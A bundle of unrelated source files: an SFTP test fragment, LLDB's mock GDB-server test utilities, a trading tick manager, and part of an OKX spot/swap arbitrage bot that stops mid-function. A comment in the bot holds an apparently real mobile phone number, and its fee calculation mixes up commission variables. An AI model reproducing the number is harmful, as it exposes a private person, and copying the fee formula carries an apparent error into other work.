self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])
# Make sure the client cannot distinguish between a resource that does not exist
# vs. one they simply don't have read access to.
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/regularuser/Private')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')
sftpClient.close()
client.close()
|
gdbclientutils.py
|
import ctypes
import errno
import io
import os
import os.path
import threading
import socket
import lldb
import binascii
import traceback
from lldbsuite.support import seven
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbtest_config
def checksum(message):
"""
Calculate the GDB server protocol checksum of the message.
The GDB server protocol uses a simple modulo 256 sum.
"""
check = 0
for c in message:
check += ord(c)
return check % 256
def frame_packet(message):
"""
Create a framed packet that's ready to send over the GDB connection
channel.
Framing includes surrounding the message between $ and #, and appending
a two character hex checksum.
"""
return "$%s#%02x" % (message, checksum(message))
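# Editor's note: a small illustrative check. 'O' + 'K' sums to 154 == 0x9a, so the
# framed form of "OK" is "$OK#9a".
def _frame_packet_example():
    assert checksum("OK") == 0x9a
    assert frame_packet("OK") == "$OK#9a"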
def escape_binary(message):
"""
Escape the binary message using the process described in the GDB server
protocol documentation.
    Most bytes are sent through as-is, but $, #, and } are escaped by writing
    a } followed by the original byte XOR'd with 0x20.
"""
out = ""
for c in message:
d = ord(c)
if d in (0x23, 0x24, 0x7d):
out += chr(0x7d)
out += chr(d ^ 0x20)
else:
out += c
return out
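# Editor's note: a small illustrative check. '}' (0x7d) is escaped as '}' followed by
# chr(0x7d ^ 0x20) == ']', while ordinary bytes pass through unchanged.
def _escape_binary_example():
    assert escape_binary("}") == "}]"
    assert escape_binary("abc") == "abc"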
def hex_encode_bytes(message):
"""
Encode the binary message by converting each byte into a two-character
hex string.
"""
out = ""
for c in message:
out += "%02x" % ord(c)
return out
def hex_decode_bytes(hex_bytes):
"""
Decode the hex string into a binary message by converting each two-character
hex string into a single output byte.
"""
out = ""
    hex_len = len(hex_bytes)
    i = 0
    while i < hex_len - 1:
        out += chr(int(hex_bytes[i:i + 2], 16))
        i += 2
return out
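# Editor's note: a small illustrative round trip between the two hex helpers above.
def _hex_codec_example():
    assert hex_encode_bytes("OK") == "4f4b"
    assert hex_decode_bytes("4f4b") == "OK"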
class MockGDBServerResponder:
"""
A base class for handling client packets and issuing server responses for
GDB tests.
This handles many typical situations, while still allowing subclasses to
completely customize their responses.
Most subclasses will be interested in overriding the other() method, which
handles any packet not recognized in the common packet handling code.
"""
registerCount = 40
packetLog = None
def __init__(self):
self.packetLog = []
def respond(self, packet):
"""
Return the unframed packet data that the server should issue in response
to the given packet received from the client.
"""
self.packetLog.append(packet)
if packet is MockGDBServer.PACKET_INTERRUPT:
return self.interrupt()
if packet == "c":
return self.cont()
if packet.startswith("vCont;c"):
return self.vCont(packet)
if packet[0] == "A":
return self.A(packet)
if packet[0] == "D":
return self.D(packet)
if packet[0] == "g":
return self.readRegisters()
if packet[0] == "G":
# Gxxxxxxxxxxx
# Gxxxxxxxxxxx;thread:1234;
return self.writeRegisters(packet[1:].split(';')[0])
if packet[0] == "p":
regnum = packet[1:].split(';')[0]
return self.readRegister(int(regnum, 16))
if packet[0] == "P":
register, value = packet[1:].split("=")
return self.writeRegister(int(register, 16), value)
if packet[0] == "m":
addr, length = [int(x, 16) for x in packet[1:].split(',')]
return self.readMemory(addr, length)
if packet[0] == "M":
location, encoded_data = packet[1:].split(":")
addr, length = [int(x, 16) for x in location.split(',')]
return self.writeMemory(addr, encoded_data)
if packet[0:7] == "qSymbol":
return self.qSymbol(packet[8:])
if packet[0:10] == "qSupported":
return self.qSupported(packet[11:].split(";"))
if packet == "qfThreadInfo":
return self.qfThreadInfo()
if packet == "qsThreadInfo":
return self.qsThreadInfo()
if packet == "qC":
return self.qC()
if packet == "QEnableErrorStrings":
return self.QEnableErrorStrings()
if packet == "?":
return self.haltReason()
if packet == "s":
return self.haltReason()
if packet[0] == "H":
tid = packet[2:]
if "." in tid:
assert tid.startswith("p")
# TODO: do we want to do anything with PID?
tid = tid.split(".", 1)[1]
return self.selectThread(packet[1], int(tid, 16))
if packet[0:6] == "qXfer:":
obj, read, annex, location = packet[6:].split(":")
offset, length = [int(x, 16) for x in location.split(',')]
data, has_more = self.qXferRead(obj, annex, offset, length)
if data is not None:
return self._qXferResponse(data, has_more)
return ""
if packet.startswith("vAttach;"):
pid = packet.partition(';')[2]
return self.vAttach(int(pid, 16))
if packet[0] == "Z":
return self.setBreakpoint(packet)
if packet.startswith("qThreadStopInfo"):
            threadnum = int(packet[15:], 16)
return self.threadStopInfo(threadnum)
if packet == "QThreadSuffixSupported":
return self.QThreadSuffixSupported()
if packet == "QListThreadsInStopReply":
return self.QListThreadsInStopReply()
if packet.startswith("qMemoryRegionInfo:"):
return self.qMemoryRegionInfo(int(packet.split(':')[1], 16))
if packet == "qQueryGDBServer":
return self.qQueryGDBServer()
if packet == "qHostInfo":
return self.qHostInfo()
if packet == "qGetWorkingDir":
return self.qGetWorkingDir()
if packet == "qOffsets":
            return self.qOffsets()
if packet == "qsProcessInfo":
return self.qsProcessInfo()
if packet.startswith("qfProcessInfo"):
return self.qfProcessInfo(packet)
if packet.startswith("qPathComplete:"):
return self.qPathComplete()
if packet.startswith("vFile:"):
return self.vFile(packet)
if packet.startswith("vRun;"):
return self.vRun(packet)
if packet.startswith("qLaunchSuccess"):
return self.qLaunchSuccess()
if packet.startswith("QEnvironment:"):
return self.QEnvironment(packet)
if packet.startswith("QEnvironmentHexEncoded:"):
return self.QEnvironmentHexEncoded(packet)
if packet.startswith("qRegisterInfo"):
regnum = int(packet[len("qRegisterInfo"):], 16)
return self.qRegisterInfo(regnum)
return self.other(packet)
def qsProcessInfo(self):
return "E04"
def qfProcessInfo(self, packet):
return "E04"
def qGetWorkingDir(self):
return "2f"
def qOffsets(self):
return ""
def qHostInfo(self):
return "ptrsize:8;endian:little;"
def qQueryGDBServer(self):
return "E04"
def interrupt(self):
raise self.UnexpectedPacketException()
def cont(self):
raise self.UnexpectedPacketException()
def vCont(self, packet):
raise self.UnexpectedPacketException()
def A(self, packet):
return ""
def D(self, packet):
return "OK"
def readRegisters(self):
return "00000000" * self.registerCount
def readRegister(self, register):
return "00000000"
def writeRegisters(self, registers_hex):
return "OK"
def writeRegister(self, register, value_hex):
return "OK"
def readMemory(self, addr, length):
return "00" * length
def writeMemory(self, addr, data_hex):
return "OK"
def qSymbol(self, symbol_args):
return "OK"
def qSupported(self, client_supported):
return "qXfer:features:read+;PacketSize=3fff;QStartNoAckMode+"
def qfThreadInfo(self):
return "l"
def qsThreadInfo(self):
return "l"
def qC(self):
return "QC0"
def QEnableErrorStrings(self):
return "OK"
def haltReason(self):
# SIGINT is 2, return type is 2 digit hex string
return "S02"
def qXferRead(self, obj, annex, offset, length):
return None, False
def _qXferResponse(self, data, has_more):
return "%s%s" % ("m" if has_more else "l", escape_binary(data))
def vAttach(self, pid):
raise self.UnexpectedPacketException()
def selectThread(self, op, thread_id):
return "OK"
def setBreakpoint(self, packet):
raise self.UnexpectedPacketException()
def threadStopInfo(self, threadnum):
return ""
def other(self, packet):
# empty string means unsupported
return ""
def QThreadSuffixSupported(self):
return ""
def QListThreadsInStopReply(self):
return ""
def qMemoryRegionInfo(self, addr):
return ""
def qPathComplete(self):
return ""
def vFile(self, packet):
return ""
def vRun(self, packet):
return ""
def qLaunchSuccess(self):
return ""
def QEnvironment(self, packet):
return "OK"
def QEnvironmentHexEncoded(self, packet):
return "OK"
def qRegisterInfo(self, num):
return ""
"""
Raised when we receive a packet for which there is no default action.
Override the responder class to implement behavior suitable for the test at
hand.
"""
class UnexpectedPacketException(Exception):
pass
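# Illustrative sketch (assumption, not part of the original file): as the docstring
# above suggests, tests tailor server behavior by subclassing MockGDBServerResponder.
# The class name and register value below are invented for the example.
class _ExampleFixedRegisterResponder(MockGDBServerResponder):
    registerCount = 4

    def readRegister(self, register):
        # Every register reads back the same little-endian hex payload.
        return "78563412"

    def readRegisters(self):
        # "g" packet: concatenate all register contents.
        return self.readRegister(0) * self.registerCount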
class ServerSocket:
"""
A wrapper class for TCP or pty-based server.
"""
def get_connect_address(self):
"""Get address for the client to connect to."""
def get_connect_url(self):
"""Get URL suitable for process connect command."""
def close_server(self):
"""Close all resources used by the server."""
def accept(self):
"""Accept a single client connection to the server."""
def close_connection(self):
"""Close all resources used by the accepted connection."""
def recv(self):
"""Receive a data packet from the connected client."""
def sendall(self, data):
"""Send the data to the connected client."""
class TCPServerSocket(ServerSocket):
def __init__(self):
family, type, proto, _, addr = socket.getaddrinfo(
"localhost", 0, proto=socket.IPPROTO_TCP)[0]
self._server_socket = socket.socket(family, type, proto)
self._connection = None
self._server_socket.bind(addr)
self._server_socket.listen(1)
def get_connect_address(self):
return "[{}]:{}".format(*self._server_socket.getsockname())
def get_connect_url(self):
return "connect://" + self.get_connect_address()
def close_server(self):
self._server_socket.close()
def accept(self):
assert self._connection is None
# accept() is stubborn and won't fail even when the socket is
# shutdown, so we'll use a timeout
self._server_socket.settimeout(30.0)
client, client_addr = self._server_socket.accept()
        # The connected client inherits its timeout from self._server_socket,
        # but we'll use a blocking socket for the client
client.settimeout(None)
self._connection = client
def close_connection(self):
assert self._connection is not None
self._connection.close()
self._connection = None
def recv(self):
assert self._connection is not None
return self._connection.recv(4096)
def sendall(self, data):
assert self._connection is not None
return self._connection.sendall(data)
class PtyServerSocket(ServerSocket):
def __init__(self):
import pty
import tty
master, slave = pty.openpty()
tty.setraw(master)
self._master = io.FileIO(master, 'r+b')
self._slave = io.FileIO(slave, 'r+b')
def get_connect_address(self):
libc = ctypes.CDLL(None)
libc.ptsname.argtypes = (ctypes.c_int,)
libc.ptsname.restype = ctypes.c_char_p
return libc.ptsname(self._master.fileno()).decode()
def get_connect_url(self):
return "file://" + self.get_connect_address()
def close_server(self):
self._slave.close()
self._master.close()
def recv(self):
try:
return self._master.read(4096)
except OSError as e:
# closing the pty results in EIO on Linux, convert it to EOF
if e.errno == errno.EIO:
return b''
raise
def sendall(self, data):
return self._master.write(data)
class MockGDBServer:
"""
A simple TCP-based GDB server that can test client behavior by receiving
commands and issuing custom-tailored responses.
Responses are generated via the .responder property, which should be an
instance of a class based on MockGDBServerResponder.
"""
responder = None
_socket = None
_thread = None
_receivedData = None
_receivedDataOffset = None
_shouldSendAck = True
def __init__(self, socket_class):
self._socket_class = socket_class
self.responder = MockGDBServerResponder()
def start(self):
self._socket = self._socket_class()
# Start a thread that waits for a client connection.
self._thread = threading.Thread(target=self._run)
self._thread.start()
def stop(self):
self._socket.close_server()
self._thread.join()
self._thread = None
def get_connect_address(self):
return self._socket.get_connect_address()
def get_connect_url(self):
return self._socket.get_connect_url()
def _run(self):
# For testing purposes, we only need to worry about one client
# connecting just one time.
try:
self._socket.accept()
except:
return
self._shouldSendAck = True
self._receivedData = ""
self._receivedDataOffset = 0
data = None
while True:
try:
data = seven.bitcast_to_string(self._socket.recv())
if data is None or len(data) == 0:
break
self._receive(data)
except Exception as e:
print("An exception happened when receiving the response from the gdb server. Closing the client...")
traceback.print_exc()
self._socket.close_connection()
break
def _receive(self, data):
"""
Collects data, parses and responds to as many packets as exist.
Any leftover data is kept for parsing the next time around.
"""
self._receivedData += data
try:
packet = self._parsePacket()
while packet is not None:
self._handlePacket(packet)
packet = self._parsePacket()
except self.InvalidPacketException:
self._socket.close_connection()
def _parsePacket(self):
"""
Reads bytes from self._receivedData, returning:
- a packet's contents if a valid packet is found
- the PACKET_ACK unique object if we got an ack
- None if we only have a partial packet
Raises an InvalidPacketException if unexpected data is received
or if checksums fail.
Once a complete packet is found at the front of self._receivedData,
        its data is removed from self._receivedData.
"""
data = self._receivedData
i = self._receivedDataOffset
data_len = len(data)
if data_len == 0:
return None
if i == 0:
# If we're looking at the start of the received data, that means
# we're looking for the start of a new packet, denoted by a $.
# It's also possible we'll see an ACK here, denoted by a +
if data[0] == '+':
self._receivedData = data[1:]
return self.PACKET_ACK
if ord(data[0]) == 3:
self._receivedData = data[1:]
return self.PACKET_INTERRUPT
if data[0] == '$':
i += 1
else:
raise self.InvalidPacketException(
"Unexpected leading byte: %s" % data[0])
# If we're looking beyond the start of the received data, then we're
# looking for the end of the packet content, denoted by a #.
# Note that we pick up searching from where we left off last time
while i < data_len and data[i] != '#':
i += 1
# If there isn't enough data left for a checksum, just remember where
# we left off so we can pick up there the next time around
if i > data_len - 3:
self._receivedDataOffset = i
return None
# If we have enough data remaining for the checksum, extract it and
# compare to the packet contents
packet = data[1:i]
i += 1
try:
check = int(data[i:i + 2], 16)
except ValueError:
raise self.InvalidPacketException("Checksum is not valid hex")
i += 2
if check != checksum(packet):
raise self.InvalidPacketException(
"Checksum %02x does not match content %02x" %
(check, checksum(packet)))
# remove parsed bytes from _receivedData and reset offset so parsing
# can start on the next packet the next time around
self._receivedData = data[i:]
self._receivedDataOffset = 0
return packet
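    # Illustrative sketch (assumption, not part of the original file): the framing
    # _parsePacket expects is the standard GDB remote serial protocol framing
    # "$<payload>#<checksum>", where the checksum is the sum of the payload bytes
    # modulo 256, rendered as two hex digits (e.g. "OK" frames to "$OK#9a"). The
    # helper below is a self-contained reference; the module's own frame_packet()
    # and checksum() helpers are what the server actually uses.
    @staticmethod
    def _example_frame_packet(payload):
        body_checksum = sum(ord(c) for c in payload) % 256
        return "$%s#%02x" % (payload, body_checksum)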
def _handlePacket(self, packet):
if packet is self.PACKET_ACK:
# Ignore ACKs from the client. For the future, we can consider
# adding validation code to make sure the client only sends ACKs
# when it's supposed to.
return
response = ""
# We'll handle the ack stuff here since it's not something any of the
# tests will be concerned about, and it'll get turned off quickly anyway.
if self._shouldSendAck:
self._socket.sendall(seven.bitcast_to_bytes('+'))
if packet == "QStartNoAckMode":
self._shouldSendAck = False
response = "OK"
elif self.responder is not None:
# Delegate everything else to our responder
response = self.responder.respond(packet)
# Handle packet framing since we don't want to bother tests with it.
if response is not None:
framed = frame_packet(response)
self._socket.sendall(seven.bitcast_to_bytes(framed))
PACKET_ACK = object()
PACKET_INTERRUPT = object()
class InvalidPacketException(Exception):
pass
class GDBRemoteTestBase(TestBase):
"""
Base class for GDB client tests.
This class will setup and start a mock GDB server for the test to use.
It also provides assertPacketLogContains, which simplifies the checking
of packets sent by the client.
"""
NO_DEBUG_INFO_TESTCASE = True
mydir = TestBase.compute_mydir(__file__)
server = None
server_socket_class = TCPServerSocket
def setUp(self):
TestBase.setUp(self)
self.server = MockGDBServer(socket_class=self.server_socket_class)
self.server.start()
def tearDown(self):
# TestBase.tearDown will kill the process, but we need to kill it early
# so its client connection closes and we can stop the server before
# finally calling the base tearDown.
if self.process() is not None:
self.process().Kill()
self.server.stop()
TestBase.tearDown(self)
def createTarget(self, yaml_path):
"""
Create a target by auto-generating the object based on the given yaml
instructions.
This will track the generated object so it can be automatically removed
during tearDown.
"""
yaml_base, ext = os.path.splitext(yaml_path)
obj_path = self.getBuildArtifact(yaml_base)
self.yaml2obj(yaml_path, obj_path)
return self.dbg.CreateTarget(obj_path)
def connect(self, target):
"""
Create a process by connecting to the mock GDB server.
Includes assertions that the process was successfully created.
"""
listener = self.dbg.GetListener()
error = lldb.SBError()
process = target.ConnectRemote(listener,
self.server.get_connect_url(), "gdb-remote", error)
self.assertTrue(error.Success(), error.description)
self.assertTrue(process, PROCESS_IS_VALID)
return process
def assertPacketLogContains(self, packets):
"""
Assert that the mock server's packet log contains the given packets.
The packet log includes all packets sent by the client and received
        by the server. This function makes it easy to verify that the client
        sent the expected packets to the server.
        The check does not require that the packets be consecutive, but it does
        require that they appear in the log in the same order as in the argument.
"""
i = 0
j = 0
log = self.server.responder.packetLog
while i < len(packets) and j < len(log):
if log[j] == packets[i]:
i += 1
j += 1
if i < len(packets):
self.fail(u"Did not receive: %s\nLast 10 packets:\n\t%s" %
(packets[i], u'\n\t'.join(log)))
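# Illustrative sketch (assumption, not part of the original file): a typical test
# built on GDBRemoteTestBase installs a responder, connects, and then inspects the
# packet log. The class, target, and asserted packet below are invented for the
# example.
#
#     class TestExample(GDBRemoteTestBase):
#         def test_connect(self):
#             self.server.responder = _ExampleFixedRegisterResponder()
#             target = self.dbg.CreateTarget("")
#             process = self.connect(target)
#             self.assertTrue(process.IsValid())
#             self.assertPacketLogContains(["qHostInfo"])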
class GDBPlatformClientTestBase(GDBRemoteTestBase):
"""
Base class for platform server clients.
This class extends GDBRemoteTestBase by automatically connecting
via "platform connect" in the setUp() method.
"""
def setUp(self):
super().setUp()
self.runCmd("platform select remote-gdb-server")
self.runCmd("platform connect " + self.server.get_connect_url())
self.assertTrue(self.dbg.GetSelectedPlatform().IsConnected())
def tearDown(self):
self.dbg.GetSelectedPlatform().DisconnectRemote()
super().tearDown()
|
tick_manager.py
|
from threading import Thread, Lock
from config import config
from slq_lite_database import Storage
from tick_listener import TickListener
from position import Position
from trade_algorithm import TradeAlgorithm
class TickManager(TickListener):
def __init__(self, priceHistory) -> None:
self.MAX_POSITION_LOAD = config['positionLoad']
self.SYMBOL = config['tickerSymbol']
self.tradeAlgorithm = TradeAlgorithm(self.__enter_position)
self.positionLock = Lock()
self.storage = Storage()
self.positions = self.storage.open_positions()
self.tickHistory = priceHistory
def tick_event(self, tickPrice, closePeriod):
thread = Thread(target=self.__tick_worker, args=(tickPrice, closePeriod))
thread.start()
    def __tick_worker(self, tickPrice, onClose):
        print("tick event thread started")
        # Hold the lock for the whole update; 'with' releases it even if a notify
        # call raises.
        with self.positionLock:
            # Iterate over a copy so closed positions can be removed safely.
            for p in list(self.positions):
                if p.inPosition:
                    p.notify(tickPrice)
                else:
                    self.storage.close_position(p)
                    self.positions.remove(p)
            if onClose:
                self.__update(tickPrice)
def __update(self, tickPrice):
self.tickHistory.append(tickPrice)
ma = self.tradeAlgorithm.evaluate(self.tickHistory)
for p in self.positions:
p.notify_close(tickPrice, ma)
self.tickHistory = self.tickHistory[-120:]
def __enter_position(self) -> None:
if len(self.positions) < self.MAX_POSITION_LOAD:
new_position = Position.create_position(self.tickHistory[-1], self.SYMBOL)
self.storage.new_position(new_position)
self.positions.append(new_position)
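# Illustrative sketch (assumption, not from the original module): TickManager is
# driven through the TickListener callback by a price feed. Hypothetical wiring:
#
#     manager = TickManager(priceHistory=[100.0, 100.5, 101.0])
#     # Each price update spawns a worker thread; closePeriod marks the tick that
#     # closes a candle and triggers the moving-average evaluation in __update().
#     manager.tick_event(tickPrice=101.2, closePeriod=False)
#     manager.tick_event(tickPrice=101.4, closePeriod=True)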
|
OKX_cusID_open_1007.py
|
import okex.Public_api as Public
import okex.Trade_api as Trade
import okex.Account_api as Account
import okex.Market_api as Market
import okex.Funding_api as Funding
from multiprocessing import Process, Queue, Pool,Manager
import os,sys
import numpy as np
import asyncio
import websockets
import json
import requests
import psutil
import hmac
import base64
import zlib
import datetime
from datetime import datetime
import pandas as pd
import time
import nest_asyncio
import math
from decimal import Decimal, getcontext, setcontext,ROUND_DOWN, ROUND_UP,ROUND_CEILING
from dateutil.parser import parse
nest_asyncio.apply()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def take_long_order(mode_take_long_order,*args,**kwargs):
swap_instrument_id = mode_take_long_order['swap_instrument_id']
spot_instrument_id = mode_take_long_order['spot_instrument_id']
spot_price = mode_take_long_order['spot_price']
swap_price = mode_take_long_order['swap_price']
spot_size = mode_take_long_order['spot_size']
swap_size = mode_take_long_order['swap_size']
spot_order_type = mode_take_long_order['spot_order_type']
swap_order_type = mode_take_long_order['swap_order_type']
    # place the spot order
if float(spot_size) !=0:
A = tradeAPI.place_order(instId=spot_instrument_id , tdMode='cross', side='buy', ordType=spot_order_type, sz=spot_size, px=spot_price)
else:
A='none'
    # place the swap order
if float(swap_size) != 0:
        # buy/sell (net) mode is in use, so posSide is not set
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='sell', ordType=swap_order_type, sz=swap_size, px=swap_price)
else:
B = 'none'
return A,B
def take_short_order(mode_take_short_order,*args,**kwargs):
swap_instrument_id = mode_take_short_order['swap_instrument_id']
spot_instrument_id = mode_take_short_order['spot_instrument_id']
spot_price = mode_take_short_order['spot_price']
swap_price = mode_take_short_order['swap_price']
spot_size = mode_take_short_order['spot_size']
swap_size = mode_take_short_order['swap_size']
spot_order_type = mode_take_short_order['spot_order_type']
swap_order_type = mode_take_short_order['swap_order_type']
    # place the spot order
if float(spot_size)!=0:
        A = tradeAPI.place_order(instId=spot_instrument_id, tdMode='cross', side='sell', ordType=spot_order_type, sz=spot_size, px=spot_price)  # posSide intentionally omitted here for now
else:
A='none'
    # place the swap order
if float(swap_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='buy', ordType=swap_order_type, sz=swap_size, px=swap_price)
else:
B = 'none'
return A,B
def take_close_long_order(mode_take_close_long_order,*args,**kwargs):
swap_instrument_id = mode_take_close_long_order['swap_instrument_id']
spot_instrument_id = mode_take_close_long_order['spot_instrument_id']
spot_close_price = mode_take_close_long_order['spot_close_price']
swap_close_price = mode_take_close_long_order['swap_close_price']
spot_close_size = mode_take_close_long_order['spot_close_size']
swap_close_size = mode_take_close_long_order['swap_close_size']
spot_order_type = mode_take_close_long_order['spot_order_type']
swap_order_type = mode_take_close_long_order['swap_order_type']
    # place the spot order
if float(spot_close_size) != 0:
A = tradeAPI.place_order(instId=spot_instrument_id, tdMode='cross', side='sell', ordType=spot_order_type, sz=spot_close_size, px=spot_close_price)
else:
A = 'none'
    # place the swap order
if float(swap_close_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='buy', ordType=swap_order_type, sz=swap_close_size, px=swap_close_price)
else:
B = 'none'
return A, B
def take_close_short_order(mode_take_close_short_order,*args,**kwargs):
swap_instrument_id = mode_take_close_short_order['swap_instrument_id']
spot_instrument_id = mode_take_close_short_order['spot_instrument_id']
spot_close_price = mode_take_close_short_order['spot_close_price']
swap_close_price = mode_take_close_short_order['swap_close_price']
spot_close_size = mode_take_close_short_order['spot_close_size']
swap_close_size = mode_take_close_short_order['swap_close_size']
spot_order_type = mode_take_close_short_order['spot_order_type']
swap_order_type = mode_take_close_short_order['swap_order_type']
    # place the spot order
if float(spot_close_size) != 0:
A = tradeAPI.place_order(instId=spot_instrument_id, tdMode='cross', side='buy', ordType=spot_order_type, sz=spot_close_size, px=spot_close_price)
else:
A = 'none'
    # place the swap order
if float(swap_close_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='sell', ordType=swap_order_type, sz=swap_close_size, px=swap_close_price)
else:
B = 'none'
return A, B
def take_open_long_final_open_order(mode_take_open_long_final_open_order,*args,**kwargs):
swap_instrument_id = mode_take_open_long_final_open_order['swap_instrument_id']
swap_price = mode_take_open_long_final_open_order['swap_price']
swap_size = mode_take_open_long_final_open_order['swap_size']
swap_order_type = mode_take_open_long_final_open_order['swap_order_type']
    # keep opening the swap short leg
if float(swap_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='sell', ordType=swap_order_type, sz=swap_size, px=swap_price)
else:
B = 'none'
return B
def take_open_short_final_open_order(mode_take_open_short_final_open_order,*args,**kwargs):
swap_instrument_id = mode_take_open_short_final_open_order['swap_instrument_id']
swap_price = mode_take_open_short_final_open_order['swap_price']
swap_size = mode_take_open_short_final_open_order['swap_size']
swap_order_type = mode_take_open_short_final_open_order['swap_order_type']
    # keep opening the swap long leg
if float(swap_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='buy', ordType=swap_order_type, sz=swap_size, px=swap_price)
else:
B = 'none'
return B
def take_open_long_final_close_order(mode_take_open_long_final_close_order,*args,**kwargs):
swap_instrument_id = mode_take_open_long_final_close_order['swap_instrument_id']
swap_price = mode_take_open_long_final_close_order['swap_price']
swap_size = mode_take_open_long_final_close_order['swap_size']
swap_order_type = mode_take_open_long_final_close_order['swap_order_type']
    # the swap position exceeds spot, so close part of the short
if float(swap_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='buy', ordType=swap_order_type, sz=swap_size, px=swap_price)
else:
B = 'none'
return B
def take_open_short_final_close_order(mode_take_open_short_final_close_order,*args,**kwargs):
swap_instrument_id = mode_take_open_short_final_close_order['swap_instrument_id']
swap_price = mode_take_open_short_final_close_order['swap_price']
swap_size = mode_take_open_short_final_close_order['swap_size']
swap_order_type = mode_take_open_short_final_close_order['swap_order_type']
    # the swap position exceeds spot, so close part of the long
if float(swap_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='sell', ordType=swap_order_type, sz=swap_size, px=swap_price)
else:
B = 'none'
return B
def take_close_long_final_close_order(mode_take_close_long_final_close_order,*args,**kwargs):
swap_instrument_id = mode_take_close_long_final_close_order['swap_instrument_id']
swap_close_price = mode_take_close_long_final_close_order['swap_close_price']
swap_close_size = mode_take_close_long_final_close_order['swap_close_size']
swap_order_type = mode_take_close_long_final_close_order['swap_order_type']
    # the swap leg has not closed enough, keep closing the short
if float(swap_close_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='buy', ordType=swap_order_type, sz=swap_close_size, px=swap_close_price)
else:
B = 'none'
return B
def take_close_short_final_close_order(mode_take_close_short_final_close_order,*args,**kwargs):
swap_instrument_id = mode_take_close_short_final_close_order['swap_instrument_id']
swap_close_price = mode_take_close_short_final_close_order['swap_close_price']
swap_close_size = mode_take_close_short_final_close_order['swap_close_size']
swap_order_type = mode_take_close_short_final_close_order['swap_order_type']
    # the swap leg still needs to close more of the long
if float(swap_close_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='sell', ordType=swap_order_type, sz=swap_close_size, px=swap_close_price)
else:
B = 'none'
return B
def take_close_long_final_open_order(mode_take_close_long_final_open_order,*args,**kwargs):
swap_instrument_id = mode_take_close_long_final_open_order['swap_instrument_id']
swap_close_price = mode_take_close_long_final_open_order['swap_close_price']
swap_close_size = mode_take_close_long_final_open_order['swap_close_size']
swap_order_type = mode_take_close_long_final_open_order['swap_order_type']
    # open a swap short
if float(swap_close_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='sell', ordType=swap_order_type, sz=swap_close_size, px=swap_close_price)
else:
B = 'none'
return B
def take_close_short_final_open_order(mode_take_close_short_final_open_order,*args,**kwargs):
swap_instrument_id = mode_take_close_short_final_open_order['swap_instrument_id']
swap_close_price = mode_take_close_short_final_open_order['swap_close_price']
swap_close_size = mode_take_close_short_final_open_order['swap_close_size']
swap_order_type = mode_take_close_short_final_open_order['swap_order_type']
    # open a swap long
if float(swap_close_size) != 0:
B = tradeAPI.place_order(instId=swap_instrument_id, tdMode='cross', side='buy', ordType=swap_order_type, sz=swap_close_size, px=swap_close_price)
else:
B = 'none'
return B
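# Illustrative sketch (assumption, not from the original module): every take_* helper
# above receives a plain dict describing both legs; the instrument IDs and numbers
# below are invented for the example.
#
#     mode_take_long_order = {
#         'swap_instrument_id': 'BTC-USDT-SWAP', 'spot_instrument_id': 'BTC-USDT',
#         'spot_price': '30000', 'swap_price': '30010',
#         'spot_size': '0.01', 'swap_size': '1',
#         'spot_order_type': 'limit', 'swap_order_type': 'limit',
#     }
#     A, B = take_long_order(mode_take_long_order)  # A: spot order result, B: swap order result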
def sendmessage(message):
url = ''
HEADERS = {"Content-Type": "application/json ;charset=utf-8 "}
message = message
String_textMsg = {
'msgtype':'text',
'text':{'content':message},
        # 'at': {'atMobiles': {'15201106731'}, 'isAtAll': 0}  # set isAtAll to 1 to @ everyone
}
String_textMsg = json.dumps(String_textMsg)
res = requests.post(url, data=String_textMsg, headers=HEADERS)
def sendmessage_to_customer(message):
url = ''
HEADERS = {"Content-Type": "application/json ;charset=utf-8 "}
message = message
String_textMsg = {
'msgtype':'text',
'text':{'content':message}}
String_textMsg = json.dumps(String_textMsg)
res = requests.post(url, data=String_textMsg, headers=HEADERS)
def funding_recalculate(swap_instrument_id):
A=publicAPI.get_funding_rate(swap_instrument_id)['data']
time.sleep(0.3)
#print(past_funding_rate)
# day3Afundrate=[]
instId_fu = None
# for i in past_funding_rate:
# day3Afundrate.append(precfloat(i['realizedRate'], 6))
# instId_fu = i['instId']
# Afundrate = np.array(day3Afundrate)
for i in A:
instId_fu = i['instId']
present_funding_rate = float(i['fundingRate'])
predict_funding_rate = float(i['nextFundingRate'])
return instId_fu, present_funding_rate, predict_funding_rate
def make_So_Sc(mode_So_Sc, *args, **kwargs):
maker_commission_spot = mode_So_Sc['maker_commission_spot']
maker_commission_swap = mode_So_Sc['maker_commission_swap']
taker_commission_swap = mode_So_Sc['taker_commission_swap']
taker_commission_spot = mode_So_Sc['taker_commission_spot']
swap_present_price = mode_So_Sc['swap_present_price']
    spot_index_price = mode_So_Sc['spot_index_price']  # use the spot index price
Cm_swap = maker_commission_spot * swap_present_price
Cm_spot = maker_commission_swap * swap_present_price
Ct_swap = taker_commission_swap * spot_index_price
Ct_spot = taker_commission_spot * spot_index_price
    if swap_present_price > spot_index_price:  # positive basis: a long (positive) position can be opened
        So=((swap_present_price-spot_index_price-Cm_swap-Cm_spot)+(swap_present_price-spot_index_price-Cm_swap-Cm_spot)) /2  # So is positive
        Sc=((spot_index_price-swap_present_price-Cm_swap-Cm_spot)+(spot_index_price-swap_present_price-Cm_swap-Cm_spot)) /2  # Sc not needed in this branch
    elif spot_index_price>swap_present_price:  # negative basis: a short (negative) position can be opened
        So=((swap_present_price-spot_index_price-Cm_swap-Cm_spot)+(swap_present_price-spot_index_price-Cm_swap-Cm_spot)) /2  # So not needed in this branch
